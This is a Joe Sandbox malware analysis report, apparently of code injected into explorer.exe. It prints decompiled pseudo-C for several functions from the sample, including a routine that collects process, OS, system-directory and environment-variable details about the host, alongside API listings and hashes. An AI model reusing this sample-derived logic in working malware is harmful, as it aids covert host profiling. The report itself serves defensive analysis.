0x0008e36f
0x0008e375
0x0008e385
0x0008e38a
0x0008e38f
0x0008e396
0x0008e39a
0x0008e3a1
0x0008e3a5
0x0008e3a9
0x0008e3aa
0x0008e3ad
0x0008e3b2
0x0008e3bb
0x0008e3c7
0x0008e3d1
0x0008e3d6
0x0008e3d6
0x0008e3bb
0x0008e3dc
0x0008e3dd
0x00000000
0x0008e3e6
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 0008E3D6

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 64b179eb79a5d708ba5d6aceec9956f8d6b33ae3c485e66c3a0c1383491a9227
Instruction ID: cf8cbba719ad1f7280b559319a87231f67c1453a20f1c66a795ac4a445234825
Opcode Fuzzy Hash: 64b179eb79a5d708ba5d6aceec9956f8d6b33ae3c485e66c3a0c1383491a9227
Instruction Fuzzy Hash: 44310AB6900249BFEB11DF94CC88DEEBBBCFB04350F1541A6B551E7251DB309E058B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A3D8, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A3D8(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089E9B(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E0008972A( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A076(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F13( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x0008a3d8
0x0008a3e1
0x0008a3e3
0x0008a3e5
0x0008a3e9
0x0008a3eb
0x0008a3f3
0x0008a3fa
0x0008a403
0x0008a408
0x0008a40d
0x0008a431
0x0008a436
0x0008a43c
0x0008a448
0x0008a44d
0x0008a40f
0x0008a418
0x0008a42e
0x00000000
0x0008a41a
0x0008a426
0x0008a42b
0x0008a418
0x0008a40d
0x0008a450
0x0008a451
0x0008a3eb
0x0008a45b

APIs

Part of subcall function 0008972A: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A32C,00000000,00000000,?,?,?,00085AD4), ref: 00089763

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C53,?,?,00000000), ref: 0008A40F

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 30f297d3f8757aff3cabda38c18c9a2890033c2604c1751905d7036307e0381c
Instruction ID: c65f2d1847d0f496679143b0ea34c732759674e097d6dd7c7386cc94f21754d0
Opcode Fuzzy Hash: 30f297d3f8757aff3cabda38c18c9a2890033c2604c1751905d7036307e0381c
Instruction Fuzzy Hash: A811A179B00106ABDB20FF68C885A6EB7A5BBC5304F20812AD49697752EB70ED018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00085D5E, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00085D5E(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A8AF( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x14df8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085967( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089E86();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x00085d61
0x00085d76
0x00085d7f
0x00085d88
0x00085d8a
0x00085d92
0x00085da2
0x00085db0
0x00085db5
0x00085dba
0x00085dbc
0x00085dbe
0x00085dc3
0x00085dc5
0x00085de0
0x00085de0
0x00085dc7
0x00085dc8
0x00085dd3
0x00085ddb
0x00085ddd
0x00085ddd
0x00085dc5
0x00085de2
0x00085d94
0x00085d95
0x00085d9a
0x00085d9f
0x00085d9f
0x00085de6

APIs

lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DD3

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d00af6409d9d7730e6402a6d54878263d571b594aa651e185e1b640024ca091e
Instruction ID: 957ebf8be2e43ef87ec0c01ee90cc132d95222f8a4e09199d2deefdb12ca5e3d
Opcode Fuzzy Hash: d00af6409d9d7730e6402a6d54878263d571b594aa651e185e1b640024ca091e
Instruction Fuzzy Hash: 41017171200211DFFB60FB69DC4AF9A37E8BB58781F554026F541EB191DA24EC00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008BA47, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BA47() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x14dfab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B9DA(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x14df8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x0008ba4c
0x0008ba54
0x0008ba5c
0x0008ba61
0x0008ba6b
0x0008ba74
0x0008ba79
0x0008ba7e
0x0008ba9c
0x0008ba9f
0x0008ba80
0x0008ba83
0x0008ba85
0x0008ba8d
0x0008ba8d
0x0008ba90
0x0008ba90
0x0008baa3
0x0008ba64
0x0008ba64
0x0008ba64

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction ID: 815ab03c788eb77f07b59f13ad057621fe900600088db3fca712d88f36ab8c21
Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction Fuzzy Hash: B6F08C32A10109EFDF24EBA4C945A9E77F8FB54399F1140A5F141E7160DB34DE00EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00085CCD, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085CCD(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E000924D3(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885D0();
				E00088F59();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085E97(); // executed
				E0008CFC6(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A8AF( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B379( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C07( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x00085ccd
0x00085ccd
0x00085cd0
0x00085cdf
0x00085ce4
0x00085ce9
0x00085cf0
0x00085cf6
0x00085cfc
0x00085d02
0x00085d07
0x00085d0c
0x00085d14
0x00085d1e
0x00085d2c
0x00085d34
0x00085d40
0x00085d48
0x00085d4d
0x00085d53
0x00085d5d

APIs

Part of subcall function 000885D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085F88), ref: 000885D9

Part of subcall function 0008CFC6: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083538), ref: 0008CFD2
Part of subcall function 0008CFC6: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083538), ref: 0008CFF3
Part of subcall function 0008CFC6: memset.MSVCRT ref: 0008D024
Part of subcall function 0008CFC6: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083538), ref: 0008D02F
Part of subcall function 0008CFC6: GetCurrentProcessId.KERNEL32(?,00083538), ref: 0008D035

Part of subcall function 0008B379: CloseHandle.KERNELBASE(00000000,?,00000000,00083C7D,?,?,?,?,?,?,?,?,00083D62,00000000), ref: 0008B3AC

memset.MSVCRT ref: 00085D40

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: fbea1c1dade82dcc2072efb1179648e2793e459e0306b78ed2a1691ba09f4827
Instruction ID: ac0ebb019f512fd2989d579be88d9acf46ffeb81fe06b290a6fd1fc1be1cf91d
Opcode Fuzzy Hash: fbea1c1dade82dcc2072efb1179648e2793e459e0306b78ed2a1691ba09f4827
Instruction Fuzzy Hash: 34011D71501254AFF600FBA8DC4AEC97BE4FF28350F454066F444A7263EB7469458FA2

Uniqueness

Uniqueness Score: -1.00%

Function 000885FB, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885FB(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C3D4(_t9);
						}
					} else {
						_t4 = E0008C3BB(_t9);
					}
					E00088730(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}

0x000885fe
0x00088603
0x00088649
0x00088649
0x00088606
0x0008860a
0x0008860c
0x0008860f
0x00088615
0x00088623
0x00088627
0x00088627
0x00088617
0x00088618
0x0008861d
0x00088630
0x00088641
0x00088641
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088641

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 14da9eea63f4fc1ca8dcbff6d1e36c3ea547d303668a5e84f77016895f7a9f75
Instruction ID: ac77b0697af9c8c148687bd0fcb5b8090f73c4e4272c6babf244afc233e7cf0e
Opcode Fuzzy Hash: 14da9eea63f4fc1ca8dcbff6d1e36c3ea547d303668a5e84f77016895f7a9f75
Instruction Fuzzy Hash: E1F0E5319015146BEA603B24AC01FAE3398BF01B35FA48241F954AB2D1EF30AD1187EA

Uniqueness

Uniqueness Score: -1.00%

Function 0008A7BF, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A7BF(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A639(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A69E(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0008a7c8
0x0008a7c9
0x0008a7ce
0x0008a7d2
0x0008a7e1
0x0008a7e9
0x0008a7f6
0x00000000
0x0008a7f9
0x0008a7ed
0x00000000
0x0008a7ed
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 42b09d797248cff8d887e946ca716a5ac2831457aee0cabffcae931d5b2cbaf9
Instruction ID: 11d377bfced09ec304d4c34b3eaadc9c69979dba6303b6e1dfc591ea1d43a9f4
Opcode Fuzzy Hash: 42b09d797248cff8d887e946ca716a5ac2831457aee0cabffcae931d5b2cbaf9
Instruction Fuzzy Hash: 02E0D1363086155FAB21BA68DC50D9E37547F463707104713F955CBAC1EE30DD515786

Uniqueness

Uniqueness Score: -1.00%

Function 00089887, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00089887(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A501( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008982B(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x0008988b
0x0008989d
0x000898ab
0x000898b8
0x000898bb
0x000898c2
0x000898c2
0x00000000
0x000898c7
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000898AB

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d99fecac5ff9757fa398d4590c6d2c75eb66309595ea13b6f2bac118df0c75b1
Instruction ID: e9b1ea7219c32b53520b66d4625a9568d031d6a9c9b20f91afff7f5a132f0059
Opcode Fuzzy Hash: d99fecac5ff9757fa398d4590c6d2c75eb66309595ea13b6f2bac118df0c75b1
Instruction Fuzzy Hash: C7F0A031200B01DFC760BF62D840966B7E9FF56354704882AE5C383A62DA31FC058791

Uniqueness

Uniqueness Score: -1.00%

Function 0008B379, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008B379(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x14df8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x14df8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x0008b379
0x0008b381
0x0008b386
0x0008b38c
0x0008b390
0x0008b392
0x0008b397
0x0008b3a0
0x0008b3a4
0x0008b3a4
0x0008b3ac
0x00000000
0x0008b3af
0x0008b3b3

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,00083C7D,?,?,?,?,?,?,?,?,00083D62,00000000), ref: 0008B3AC

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction ID: b27caacabd71a5798e5e7691a423994bccf3ed3b32d79844e5c1f18ba8ff3e42
Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction Fuzzy Hash: 7BE04F333001209BE6619B69EC4CF677AA9FBD5AA1B060169F905C7211CB248C02C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008D061, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008D061(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x6cb00000
				_t81 = E000885E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x14df8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA47();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BBCF( *_t88) == 0) {
					_t90 = E0008BAA4(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E433(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3F8(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x14dfab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x14dfa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D442(_t43, E0008C3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BC21(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x14df8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895C2(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x14df8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885B6( &_v8);
				_t124 =  *0x9e684; // 0x14df8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089621(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x14df8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x14df8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x14df8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x14df8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092339(E0008D442(_t75, E0008C3BB(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E0009230B( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008900E(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD75(_t79);
				return _t222;
			}

0x0008d061
0x0008d06b
0x0008d077
0x0008d07c
0x0008d081
0x0008d441
0x0008d441
0x0008d08e
0x0008d094
0x0008d099
0x0008d09f
0x0008d0af
0x0008d0bb
0x0008d0bb
0x0008d0c4
0x0008d0ca
0x0008d0cc
0x0008d0d5
0x0008d0d5
0x0008d0e1
0x0008d0e5
0x0008d0ea
0x0008d0f0
0x0008d0f9
0x0008d107
0x0008d10e
0x0008d113
0x0008d113
0x0008d114
0x0008d0fb
0x0008d0fb
0x0008d0fb
0x0008d11a
0x0008d125
0x0008d133
0x0008d139
0x0008d13d
0x0008d143
0x0008d14a
0x0008d151
0x0008d155
0x0008d15c
0x0008d15d
0x0008d16a
0x0008d16c
0x0008d171
0x0008d17e
0x0008d180
0x0008d180
0x0008d182
0x0008d18c
0x0008d198
0x0008d1a8
0x0008d1ae
0x0008d1b4
0x0008d1b6
0x0008d1c7
0x0008d1cd
0x0008d1d3
0x0008d1d8
0x0008d1de
0x0008d1e4
0x0008d1e9
0x0008d1ee
0x0008d1ee
0x0008d1f4
0x0008d1f4
0x0008d1fd
0x0008d209
0x0008d211
0x0008d215
0x0008d215
0x0008d211
0x0008d219
0x0008d21f
0x0008d225
0x0008d22c
0x0008d23d
0x0008d243
0x0008d24b
0x0008d252
0x0008d265
0x0008d26b
0x0008d270
0x0008d273
0x0008d276
0x0008d27c
0x0008d282
0x0008d284
0x0008d28a
0x0008d293
0x0008d296
0x0008d296
0x0008d299
0x0008d2a1
0x0008d2ac
0x0008d2b2
0x0008d2a3
0x0008d2a5
0x0008d2a5
0x0008d2bb
0x0008d2bb
0x0008d2c1
0x0008d2c9
0x0008d2d4
0x0008d2d9
0x0008d2df
0x0008d2e1
0x0008d2ee
0x0008d2ef
0x0008d2f0
0x0008d2fb
0x0008d2fd
0x0008d304
0x0008d304
0x0008d30e
0x0008d313
0x0008d318
0x0008d318
0x0008d31e
0x0008d325
0x0008d326
0x0008d333
0x0008d346
0x0008d34b
0x0008d350
0x0008d359
0x0008d359
0x0008d35f
0x0008d364
0x0008d36a
0x0008d370
0x0008d375
0x0008d37e
0x0008d380
0x0008d387
0x0008d387
0x0008d38d
0x0008d395
0x0008d39a
0x0008d39b
0x0008d3a0
0x0008d3a9
0x0008d3ab
0x0008d3b6
0x0008d3b6
0x0008d3bf
0x0008d3c7
0x0008d3ce
0x0008d3d3
0x0008d3e2
0x0008d3fa
0x0008d401
0x0008d40f
0x0008d421
0x0008d428
0x0008d435
0x00000000

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

GetCurrentProcessId.KERNEL32 ref: 0008D088
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D0C4
GetCurrentProcess.KERNEL32 ref: 0008D0E1
GetLastError.KERNEL32 ref: 0008D180
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D1AE
GetLastError.KERNEL32 ref: 0008D1B4
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D209
GetCurrentProcess.KERNEL32 ref: 0008D250
memset.MSVCRT ref: 0008D26B
GetVersionExA.KERNEL32(00000000), ref: 0008D276
GetCurrentProcess.KERNEL32(00000100), ref: 0008D290
GetSystemInfo.KERNEL32(?), ref: 0008D2AC
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D2C9

Strings

USERPROFILE, xrefs: 0008D326, 0008D354
TEMP, xrefs: 0008D36A, 0008D375, 0008D386
%s\%s, xrefs: 0008D33B
TEMP, xrefs: 0008D335
